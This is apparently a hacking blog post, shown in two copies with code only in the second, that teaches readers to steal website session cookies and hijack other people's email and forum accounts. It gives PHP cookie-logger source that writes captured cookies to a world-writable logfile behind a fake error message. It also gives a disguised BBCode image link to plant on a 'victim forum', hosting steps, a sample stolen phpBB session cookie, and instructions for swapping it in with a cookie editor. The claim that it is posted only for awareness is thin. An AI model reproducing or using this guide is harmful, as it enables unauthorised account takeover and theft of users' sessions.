How to hack into an email account - cookie logger
Well one of the question which is asked most to me is,"How to hack into an email account",So today i am posting a new way to hack into an email account,I am not posting this post to exite hackers but to make you aware of whats going around.
Note: This Method Will Only work, if the target Site is Vulnerable to xss.
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger
Step 1
First you have to create a file which can capture a person's cookie.So follow the following process.
Download the script
Step 2
Now you have to change "http://rafayhackingarticles.blogspot.com" to your your site, Remember one thing you should not upload the files into a directory.
Now open notepad and paste the script in it and save it as fun.gif
Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
Step 4:Create a new Notepad File and Save it as logfile.txt
Upload this file to your server
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
www.ofees.net
www.t35.com
www.ripway.com
Step 5:Go to the victim forum and insert this code in the signature or a post :
So the person who click it will think it is fun.jpg but it redirects to fun.gif
Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt
step 7
And something like this will be stored in your "logfile.txt"
Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a firefox addon named "Add and edit cookies"
Note: This Method Will Only work, if the target Site is Vulnerable to xss.
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger
Step 1
First you have to create a file which can capture a person's cookie.So follow the following process.
Download the script
Step 2
Now you have to change "http://rafayhackingarticles.blogspot.com" to your your site, Remember one thing you should not upload the files into a directory.
Now open notepad and paste the script in it and save it as fun.gif
Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 4:Create a new Notepad File and Save it as logfile.txt
Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
www.ofees.net
www.t35.com
www.ripway.com
Step 5:Go to the victim forum and insert this code in the signature or a post :
[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
So the person who click it will think it is fun.jpg but it redirects to fun.gif
Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt
step 7
And something like this will be stored in your "logfile.txt"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a firefox addon named "Add and edit cookies"